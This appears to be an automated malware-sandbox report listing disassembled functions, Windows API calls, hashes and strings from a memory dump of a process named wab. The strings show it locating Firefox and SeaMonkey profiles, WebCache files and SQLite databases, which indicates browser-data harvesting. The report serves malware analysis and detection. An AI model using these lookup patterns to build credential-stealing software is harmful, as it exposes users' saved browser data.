                                                  • memset.MSVCRT ref: 00403E50
                                                  • memset.MSVCRT ref: 00403E65
                                                  • memset.MSVCRT ref: 00403E7A
                                                  • memset.MSVCRT ref: 00403E8F
                                                  • memset.MSVCRT ref: 00403EA4
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 00403F6B
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                  • API String ID: 3527940856-2068335096
                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00403FE1
                                                  • memset.MSVCRT ref: 00403FF6
                                                  • memset.MSVCRT ref: 0040400B
                                                  • memset.MSVCRT ref: 00404020
                                                  • memset.MSVCRT ref: 00404035
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 004040FC
                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                    • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                  • API String ID: 3527940856-3369679110
                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                  • API String ID: 3510742995-2641926074
                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                  • memset.MSVCRT ref: 004033B7
                                                  • memcpy.MSVCRT ref: 004033D0
                                                  • wcscmp.MSVCRT ref: 004033FC
                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                  • String ID: $0.@
                                                  • API String ID: 3030842498-1896041820
                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 2941347001-0
                                                  • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                  • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00403C09
                                                  • memset.MSVCRT ref: 00403C1E
                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                  • wcscat.MSVCRT ref: 00403C47
                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                  • wcscat.MSVCRT ref: 00403C70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcscat$Closewcscpywcslen
                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                  • API String ID: 3249829328-1174173950
                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040A824
                                                  • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • wcscpy.MSVCRT ref: 0040A854
                                                  • wcscat.MSVCRT ref: 0040A86A
                                                  • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 669240632-0
                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcschr.MSVCRT ref: 00414458
                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                  • String ID: "%s"
                                                  • API String ID: 1343145685-3297466227
                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                  • String ID: GetProcessTimes$kernel32.dll
                                                  • API String ID: 1714573020-3385500049
                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004087D6
                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                  • memset.MSVCRT ref: 00408828
                                                  • memset.MSVCRT ref: 00408840
                                                  • memset.MSVCRT ref: 00408858
                                                  • memset.MSVCRT ref: 00408870
                                                  • memset.MSVCRT ref: 00408888
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                  • String ID:
                                                  • API String ID: 2911713577-0
                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp
                                                  • String ID: @ $SQLite format 3
                                                  • API String ID: 1475443563-3708268960
                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                  • memset.MSVCRT ref: 00414C87
                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 2705122986-2036018995
                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  • API String ID: 1579243037-1578091866
                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040E60F
                                                  • memset.MSVCRT ref: 0040E629
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  Strings
                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                  • API String ID: 3354267031-2114579845
                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                  • API String ID: 2221118986-1725073988
                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                  • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotificationSleep
                                                  • String ID: }A
                                                  • API String ID: 1821831730-2138825249
                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@DeleteObject
                                                  • String ID: r!A
                                                  • API String ID: 1103273653-628097481
                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                  • memcmp.MSVCRT ref: 00444BA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
